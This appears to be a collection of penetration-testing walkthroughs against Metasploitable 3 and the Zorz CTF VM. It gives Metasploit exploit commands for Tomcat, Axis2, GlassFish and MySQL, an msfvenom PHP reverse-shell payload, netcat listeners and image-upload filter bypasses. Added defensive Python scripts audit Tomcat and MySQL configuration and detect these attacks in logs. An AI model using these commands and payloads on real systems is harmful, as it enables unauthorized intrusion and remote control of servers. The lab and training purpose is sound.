Penetration Testing in Metasploitable 3 with SMB and Tomcat

Target: Metasploitable 3
Attacker: Kali Linux

Let’s begin by scanning the target IP to find the open ports and the services running on them. I am using the nmap command to scan the target PC. Type the following command on a terminal in Kali Linux.



From the nmap result we can see that port 8282 is open for Apache Tomcat.


Open the target IP in a browser as 192.168.1.14:8282. Tomcat is running on port 8282, but it requires credentials to access.


Now we are going to log in with PsExec over SMB port 445.

PsExec>Exec \\192.168.1.14 -u vagrant -p vagrant cmd

This command addresses the host IP and its credentials, which I obtained in my previous article (read it from here).
-u for username: vagrant
-p for password: vagrant
cmd: to enter the victim’s command prompt


As I already had a shell, I was able to retrieve the credentials from the tomcat-users.xml file, located at c:\program files\apache software foundation\tomcat\apache-tomcat-8.0.33\conf.

type tomcat-users.xml

As soon as the command executes you can see that I got the Tomcat credentials: username sploit and password sploit. Use these credentials for the attack with the Metasploit framework in Kali Linux.


Start the Metasploit framework by typing msfconsole on a terminal in Kali Linux; once Metasploit has loaded, type the commands given below for the Tomcat attack.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed "manager" application. The payload is uploaded as a WAR archive containing a jsp application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14
msf exploit(tomcat_mgr_upload) > set rport 8282
msf exploit(tomcat_mgr_upload) > set HttpUsername sploit
msf exploit(tomcat_mgr_upload) > set HttpPassword sploit
msf exploit(tomcat_mgr_upload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got the victim’s shell.
Meterpreter> sysinfo
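The whole Tomcat chain above hinges on one file: a tomcat-users.xml that binds the Manager roles to a guessable plaintext password. The following audit script is an added example (not code from the article, from Tomcat or from Metasploit) that reads such a file and reports what a defender should fix before anyone with a shell reads it. The role names are Tomcat's documented Manager/Host-Manager roles; the sample XML, the common-password list and the "no '$' means plaintext" heuristic are constructed for this example.

```python
"""Audit a Tomcat tomcat-users.xml for Manager-role accounts with weak credentials.

Added example, not from the original article. Only the Python standard library is used.
"""
import xml.etree.ElementTree as ET

# Roles that reach the Manager/Host-Manager apps, i.e. WAR deployment (Tomcat's documented names).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}
# Small constructed list of passwords common in default/lab installs; a real audit uses a larger list.
COMMON_PASSWORDS = {"tomcat", "admin", "password", "s3cret", "changeme", "root", "sploit", "vagrant"}
MIN_LENGTH = 12

# Constructed sample file modelled on the lab's configuration (not a copy of the VM's file).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="guest"/>
  <user username="sploit" password="sploit" roles="manager-gui,manager-script"/>
  <user username="ops" password="4096$8f2a1c9d$a7c3...e9" roles="manager-script"/>
  <user username="visitor" password="visitor" roles="guest"/>
</tomcat-users>
"""


def _local_name(tag):
    """Drop the '{namespace}' prefix ElementTree puts on namespaced tags."""
    return tag.rsplit("}", 1)[-1]


def weak_password_reasons(username, password):
    """Return the list of reasons a credential is weak (empty list means no finding)."""
    reasons = []
    if not password:
        reasons.append("empty password")
    elif password.lower() == username.lower():
        reasons.append("password equals username")
    if password and password.lower() in COMMON_PASSWORDS:
        reasons.append("password is on the common-password list")
    if password and len(password) < MIN_LENGTH:
        reasons.append(f"password shorter than {MIN_LENGTH} characters")
    # Tomcat's digest credential handlers store "salt$iterations$hash"; a value with no '$'
    # is almost certainly plaintext. Heuristic only; it does not parse the CredentialHandler config.
    if password and "$" not in password:
        reasons.append("password appears to be stored in plaintext")
    return reasons


def audit_tomcat_users(xml_text):
    """Return findings for every user holding a privileged role with a weak credential."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        username = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if not privileged:
            continue  # unprivileged accounts cannot deploy code; out of scope here
        reasons = weak_password_reasons(username, password)
        if reasons:
            findings.append({"username": username, "roles": privileged, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['username']}: roles={','.join(f['roles'])}; " + "; ".join(f["reasons"]))
```

Run against the sample, it reports only the sploit account (the ops account uses a long digested value and the visitor account has no Manager role). Beyond the password itself, the Manager application should not be reachable on an exposed port at all, which is the condition tomcat_mgr_upload needs.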


Another way to exploit the target

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.
msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set rhost 192.168.1.8
msf exploit(axis2_deployer) > set rport 8282
msf exploit(axis2_deployer) > exploit
Awesome!!! The meterpreter session is opened again and you have got the victim’s shell once more.

Meterpreter> sysinfo
Meterpreter> getuid


Exploitation of Metasploitable 3 using Glassfish Service

Target: Metasploitable 3
Attacker: Kali Linux

Use the nmap command to scan the target PC. Nmap will show all available open ports and their running services. Type the following command on a terminal in Kali Linux for an aggressive scan.


nmap -p- -A 192.168.1.14


Open the target IP in a browser on one of the unknown ports, 4848, as 192.168.1.14:4848


Start the Metasploit framework by typing msfconsole on a terminal in Kali Linux; once Metasploit has loaded, type the commands given below for the attack.

This module attempts to login to GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also try to do an authentication bypass against older versions of GlassFish. Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.

msf > use auxiliary/scanner/http/glassfish_login
msf auxiliary(glassfish_login) > set rhosts 192.168.1.14
msf auxiliary(glassfish_login) > set rport 4848
msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true
msf auxiliary(glassfish_login) > set user_file /root/Desktop/user.txt
msf auxiliary(glassfish_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(glassfish_login) > exploit

After a few attempts we successfully have our GlassFish login: admin: sploit


Let’s use the credentials we got from Metasploit and try to open the target IP in the browser; I am using: 192.168.1.14:4848/common/index.php

This URL opens the administration console, which asks for a username and password; now use admin and sploit as username and password respectively.


With these credentials we have breached the admin console and reached the GlassFish console, a page consisting of several common tasks.

Manual Penetration Testing in Metasploitable 3

Target: Metasploitable 3
Attacker: Kali Linux

Scan the target IP to find the open ports and their running services. I am using the nmap command to scan the target PC. Type the following command on a terminal in Kali Linux.

nmap -p- 192.168.1.14


As you can see it is showing multiple unknown open ports, but we are not able to identify the services running on the target IP.


Open the target IP in a browser on one of the unknown ports, 8585, as 192.168.1.14:8585


Under this URL I found directories such as uploads and wordpress; let’s penetrate inside them. Again type the following URL in the browser.

192.168.1.14:8585/uploads/

Now we are inside the uploads directory, but it shows nothing special.


Since nmap failed to give complete details about the open ports, I will now scan the target IP again with Nikto against the open port and the uploads directory; type the following command on the terminal:
nikto -h http://192.168.1.14:8585/uploads/

Nikto scans multiple ports on a server and checks for server configuration items such as the presence of multiple index files and HTTP server options.

Here it shows that in the uploads directory the HTTP PUT method allows clients to save files on the web server, which means I can upload a file to the server; this stage could become part of an attack by uploading a malicious file as a backdoor on the web server.
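Both the PUT upload found here and the GlassFish password guessing in the previous section leave an obvious trace in the web server's access log. The script below is an added example (not from the article or any of the tools it uses) that runs two detections over Common Log Format lines: write methods (PUT/DELETE) aimed at a served directory, rated high when any dotted segment of the filename is an executable extension, and bursts of 401 responses on a login path from one source, noting whether a success followed. The log lines, IP addresses and the LOGIN_PATHS set are constructed for this example.

```python
"""Detect PUT/DELETE writes and login-guessing bursts in a web server access log.

Added example; not code from the original article. Sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Extensions the server would execute if a file with them lands in a served directory.
EXEC_EXTS = {"php", "phtml", "phar", "jsp", "jspx", "war", "asp", "aspx", "cgi"}
# Assumed login endpoints (GlassFish's console and Tomcat's manager, for this example).
LOGIN_PATHS = {"/j_security_check", "/manager/html"}

# Constructed sample: a PUT of a script, a PUT of an image, a five-failure login burst
# that ends in a redirect (success), and one unrelated failure from another host.
SAMPLE_LOG = """\
192.168.1.12 - - [10/Mar/2024:10:00:01 +0000] "GET /uploads/ HTTP/1.1" 200 512
192.168.1.12 - - [10/Mar/2024:10:00:05 +0000] "PUT /uploads/shel.php HTTP/1.1" 201 0
192.168.1.12 - - [10/Mar/2024:10:00:09 +0000] "GET /uploads/shel.php HTTP/1.1" 200 0
192.168.1.30 - - [10/Mar/2024:10:02:00 +0000] "PUT /uploads/photo.png HTTP/1.1" 201 0
192.168.1.12 - - [10/Mar/2024:10:05:00 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.12 - - [10/Mar/2024:10:05:01 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.12 - - [10/Mar/2024:10:05:02 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.12 - - [10/Mar/2024:10:05:03 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.12 - - [10/Mar/2024:10:05:04 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.12 - - [10/Mar/2024:10:05:05 +0000] "POST /j_security_check HTTP/1.1" 302 0
192.168.1.40 - - [10/Mar/2024:10:09:00 +0000] "POST /j_security_check HTTP/1.1" 401 0
192.168.1.40 - - [10/Mar/2024:10:09:30 +0000] "POST /j_security_check HTTP/1.1" 302 0
""".splitlines()


def parse_line(line):
    """Parse one CLF line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_write_methods(lines):
    """Alert on every PUT/DELETE; severity 'high' when a filename segment is an executable extension."""
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] not in ("PUT", "DELETE"):
            continue
        name = rec["path"].rsplit("/", 1)[-1].lower()
        exts = set(name.split(".")[1:])  # shel.php -> {php}; shell.php.jpg -> {php, jpg}
        alerts.append({"ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                       "status": rec["status"],
                       "severity": "high" if exts & EXEC_EXTS else "medium"})
    return alerts


def detect_login_bursts(lines, threshold=5, window=timedelta(seconds=120)):
    """Flag a (source IP, login path) pair with >= threshold 401s inside `window`, and report
    whether that source later got a non-401 from the same path (guessing likely succeeded)."""
    by_src = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["path"] in LOGIN_PATHS:
            by_src[(rec["ip"], rec["path"])].append(rec)
    alerts = []
    for (ip, path), recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        fails = [r["ts"] for r in recs if r["status"] == 401]
        for i in range(len(fails)):
            j = i
            while j + 1 < len(fails) and fails[j + 1] - fails[i] <= window:
                j += 1
            if j - i + 1 >= threshold:
                succeeded = any(r["status"] != 401 and r["ts"] >= fails[j] for r in recs)
                alerts.append({"ip": ip, "path": path, "failures": j - i + 1,
                               "succeeded_after": succeeded})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_write_methods(SAMPLE_LOG) + detect_login_bursts(SAMPLE_LOG):
        print(alert)
```

The PUT of photo.png is still reported (at medium severity) because a content directory that accepts PUT at all is the misconfiguration Nikto flagged; the fix is to disable PUT/DELETE on that path rather than to filter by extension.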


Install the Poster plug-in from Firefox add-ons. Poster lets you perform HTTP requests with methods such as GET, POST, PUT and DELETE.


Prepare the malicious file that you will upload with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4444 -f raw

Copy the code from  to die() and save it in a file with a .php extension. I saved the backdoor as shel.php on the desktop and will later browse to this file through Poster to upload it to the web server.


Click on Tools in the menu bar, and then click on Poster in the drop-down menu.

The following dialog box will open. Here, browse to the file that you will upload and click on the PUT option. This will show you that PUT is allowed, which means you can upload through it.

It will show you that the file is uploaded and display the complete result, including headers.

And you can see the same in your browser: your file has been uploaded (in our case the file is shel.php).


Simultaneously, open metasploit and use multi/handler:

use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.12
set lport 4444
exploit

After hitting the enter key, run the file you just uploaded. It will give you a meterpreter session.

Hack the Zorz VM (CTF Challenge)


Zorz is another VM that will challenge your web app skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straightforward. This machine will probably test your web app skills once again. There are 3 different pages that should be focused on (you will see). Your goal is to successfully upload a web shell or malicious file to the server.
This machine (Zorz) does not run on VMware. So, in case you are using your Kali Linux in VMware (for attacking), you will probably need to run Zorz on a different system in VirtualBox, and of course on the same network.
You can download this machine from here: https://www.vulnhub.com/?q=zorz&sort=date-des&type=vm
Penetration Methodologies:
§  Network Scanning (Netdiscover, Nmap)
§  Exploiting each level of file-upload vulnerability
§  Directory brute-force attack (Dirb)
§  Obtaining a Netcat session for each level.

Walkthrough
Let’s start with our all-time favourite, netdiscover, to get the victim machine’s IP.
netdiscover


So, our target is located at 192.168.1.8. Let’s quickly do an nmap scan to get an idea of the open ports.
nmap -A 192.168.1.129



OK, so we have port 22 and port 80 open. Let’s visit the IP in our browser.


And it opened up like a beautiful treasure! As you can see, according to this web page, under “Contact Support” we can attach a file and discuss our problem.
So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with a text editor, add the listening IP and port, save this file as php-reverse-shell.jpg and start netcat on the listening port.





Next we try to upload this file, and our shell gets uploaded successfully.

But we have no idea where our file gets uploaded on the server. In order to get the location/directory of our shell, we run dirb with the dictionary /usr/share/dirb/wordlists/big.txt
dirb http://192.168.1.129 /usr/share/dirb/wordlists/big.txt

And we get to know of a directory named “uploads2”. Upon visiting this directory, we do not find our shell.php file there. Thus we try to manipulate the directory name and visit the directory “uploads1”. Click the php file to open it.


We have successfully exploited the level 1 security and we have a netcat session running right before us.
nc -lvp 1234


Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.

But this time we got an error: here we can upload only images with .jpg, .png and .gif extensions.


Time for some more tricks. Let us open the php-reverse-shell.php file in a text editor, add the string “GIF98” just before our script, rename the file as “php-reverse-shell.php.jpg” and try to upload it once again.

And this time it got uploaded successfully!


Time to execute the backdoor; this time the location of our file is “uploads2”. Let’s open it.

As you can observe, again we got a new netcat session and compromised the victim’s VM successfully.
nc -lvp 1234

Now for our final task, we open the third level (Zorz Image Uploader 3) in order to upload the backdoor, but here a note is clearly given about the file type you may upload. The uploaded file should be an image with a .jpeg, .jpg or .png extension and less than 100kb.

And without any edits to our “php-reverse-shell.php” file, we try uploading it here. The file uploads successfully once again, and this time the directory it has been uploaded to is uploads3.


Let’s visit the /uploads3 directory to execute the uploaded backdoor and try to obtain a netcat session once again.
As you can observe, again we got a new netcat session and compromised the victim’s VM successfully.
nc -lvp 1234
Mission accomplished. We have successfully bypassed all three levels of security on this machine.
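The three Zorz levels fail for three distinct reasons: level 1 checks nothing, level 2 trusts an extension string and a few leading bytes, and level 3 enforces only the size. The validator below is an added example (not the VM's code and not from the write-up) showing the server-side checks that close all three gaps at once: only the final extension is consulted, the body must start with the real signature of the declared type (GIF files begin with GIF87a or GIF89a; the “GIF98” string used above is not a valid GIF header), the size cap is applied, the body is scanned for script markers, and the client's filename is never used on disk. The sample inputs and the SCRIPT_MARKERS heuristic are constructed for this example.

```python
"""Server-side upload validation that rejects all three uploads from the walkthrough.

Added example; not code from the original write-up or the Zorz VM.
"""
import secrets

MAX_BYTES = 100 * 1024                 # the 100 KB limit level 3 states
ALLOWED = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
CANONICAL_EXT = {"jpeg": "jpg", "png": "png", "gif": "gif"}
SIGNATURES = {                          # real file signatures for each accepted type
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")   # heuristic; see the note below


def validate_upload(filename, data):
    """Return (accepted, reason, stored_name); stored_name is None on rejection."""
    if len(data) > MAX_BYTES:
        return False, "file exceeds size limit", None
    if "." not in filename:
        return False, "no extension", None
    # Only the last extension is consulted, so shell.php.jpg is judged as a .jpg ...
    ext = filename.rsplit(".", 1)[1].lower()
    kind = ALLOWED.get(ext)
    if kind is None:
        return False, f"extension .{ext} not allowed", None
    # ... and the body must then really start with that image type's signature.
    if not any(data.startswith(sig) for sig in SIGNATURES[kind]):
        return False, f"content does not match {kind} signature", None
    # A genuine header followed by PHP (the level-2 trick) is still rejected.
    lowered = data.lower()
    if any(marker in lowered for marker in SCRIPT_MARKERS):
        return False, "script marker found inside image body", None
    # The client's filename never reaches disk: random token plus canonical extension.
    stored = f"{secrets.token_hex(16)}.{CANONICAL_EXT[kind]}"
    return True, "ok", stored


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64           # constructed minimal PNG prefix
    print(validate_upload("photo.png", png))
    print(validate_upload("php-reverse-shell.php", b"<?php echo 'sample'; ?>"))
    print(validate_upload("php-reverse-shell.php.jpg", b"GIF98<?php echo 'sample'; ?>"))
    print(validate_upload("img.gif", b"GIF89a<?php echo 'sample'; ?>"))
```

The marker scan is a heuristic, not a proof of safety; a production service would additionally re-encode the image with an image library so that no foreign bytes survive, store uploads outside the web root (or in a directory with script execution disabled), and serve them with a fixed Content-Type. Those measures make the “where was my file uploaded to?” step from the walkthrough irrelevant even if a check is bypassed.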

Hack Metasploitable 3 using Mysql Service Exploitation

Target: Metasploitable 3
Attacker: Kali Linux

Scan the target IP to find the open ports and their running services. Use the nmap command to scan the target PC. Nmap shows all available open ports and their services; today this article will cover a MySQL attack, which requires that port to be open.

Type the following command on terminal in kali Linux.

nmap -p- -sV 192.168.0.103


And from the nmap result we can see that port 3306 is open for MySQL.


Let’s penetrate further inside it and use Nessus for vulnerability analysis. The Nessus scan result shows that the MySQL account is not password protected; when you dig further you will find that the database opens without a password. In the image, the output concludes that the root account does not have a password; moreover, it dumps the list of databases on the remote server. It also gives the hint that an attacker can launch an attack on the database.


Start the Metasploit framework by typing msfconsole on a terminal in Kali Linux; once Metasploit has loaded, type the commands given below for the MySQL attack.


This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions are not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

msf > use exploit/windows/mysql/mysql_payload
msf exploit(mysql_payload) > set rhost 192.168.0.103
msf exploit(mysql_payload) > set rport 3306
msf exploit(mysql_payload) > exploit

Wonderful!!! Our meterpreter session is opened and you have got the victim’s shell.
meterpreter> sysinfo
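The module description above names the two conditions that make this work: a root account with no password reachable on port 3306, and a server that lets SELECT ... INTO DUMPFILE write a library into the plugin directory. The script below is an added example (not from the article or from Metasploit) with two defensive pieces: an audit of a my.ini/my.cnf text for the settings that enable that write path, and a detector that scans general-log lines for INTO DUMPFILE/OUTFILE and for CREATE FUNCTION ... SONAME, the statement that registers a UDF. The config text, log lines and file paths are constructed samples; the general-log line shape follows MySQL 5.7's format.

```python
"""Defensive checks for the MySQL UDF technique: config audit plus general-log detection.

Added example; not code from the original article or from Metasploit. Samples are constructed.
"""
import re

DUMP_RE = re.compile(r"\bINTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']*)'", re.IGNORECASE)
UDF_RE = re.compile(
    r"\bCREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']*)'",
    re.IGNORECASE,
)
PLUGIN_DIR_HINT = re.compile(r"[\\/]lib[\\/]plugin[\\/]", re.IGNORECASE)

WEAK_CONFIG = """\
[mysqld]
port=3306
secure-file-priv=""
# bind-address left unset: the server accepts connections on every interface
"""
HARDENED_CONFIG = """\
[mysqld]
port=3306
bind-address=127.0.0.1
secure-file-priv="C:/mysql/uploads"
"""
# Constructed general-log lines (the paths are invented, not taken from the lab VM).
SAMPLE_GENERAL_LOG = [
    "2024-03-10T10:00:00.000001Z\t   12 Query\tSELECT @@plugin_dir",
    "2024-03-10T10:00:01.000001Z\t   12 Query\tSELECT @blob INTO DUMPFILE 'C:/mysql/lib/plugin/udfsample.dll'",
    "2024-03-10T10:00:02.000001Z\t   12 Query\tCREATE FUNCTION sys_exec RETURNS INT SONAME 'udfsample.dll'",
    "2024-03-10T10:01:00.000001Z\t   13 Query\tSELECT id, name FROM users INTO OUTFILE '/tmp/report.csv'",
]


def parse_mysqld_settings(text):
    """Return the key=value pairs under [mysqld], with dashes normalised to underscores."""
    settings, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            section = line.strip("[]").lower()
            continue
        if section == "mysqld":
            key, _, value = line.partition("=")
            settings[key.strip().lower().replace("-", "_")] = value.strip().strip('"')
    return settings


def audit_mysql_config(text):
    """List settings that make the DUMPFILE-to-plugin-directory technique easier."""
    s = parse_mysqld_settings(text)
    findings = []
    if "secure_file_priv" not in s:
        findings.append("secure_file_priv not set explicitly; set it to a dedicated directory")
    elif s["secure_file_priv"] == "":
        findings.append("secure_file_priv is empty: INTO DUMPFILE/OUTFILE may write anywhere the service can")
    if s.get("bind_address", "") in ("", "0.0.0.0", "::", "*"):
        findings.append("bind_address not restricted: port 3306 is reachable from the network")
    if "skip_grant_tables" in s:
        findings.append("skip_grant_tables: every connection gets full privileges")
    return findings


def detect_udf_activity(log_lines):
    """Flag file writes (high when the target is a library or the plugin dir) and UDF registrations."""
    alerts = []
    for line in log_lines:
        m = DUMP_RE.search(line)
        if m:
            path = m.group(1)
            high = bool(PLUGIN_DIR_HINT.search(path)) or path.lower().endswith((".dll", ".so"))
            alerts.append({"kind": "file_write", "path": path, "severity": "high" if high else "medium"})
        m = UDF_RE.search(line)
        if m:
            alerts.append({"kind": "udf_create", "function": m.group(1),
                           "library": m.group(2), "severity": "high"})
    return alerts


if __name__ == "__main__":
    print(audit_mysql_config(WEAK_CONFIG))
    for alert in detect_udf_activity(SAMPLE_GENERAL_LOG):
        print(alert)
```

The config audit cannot see the empty root password that Nessus reported; that is an account-level check (SELECT user, host FROM mysql.user WHERE authentication_string = '' on 5.7) and belongs with the plugin-directory file permissions in a separate host review. The general log is off by default and costly on a busy server, so in practice the same patterns are matched in audit-plugin output or a query proxy rather than in the general log itself.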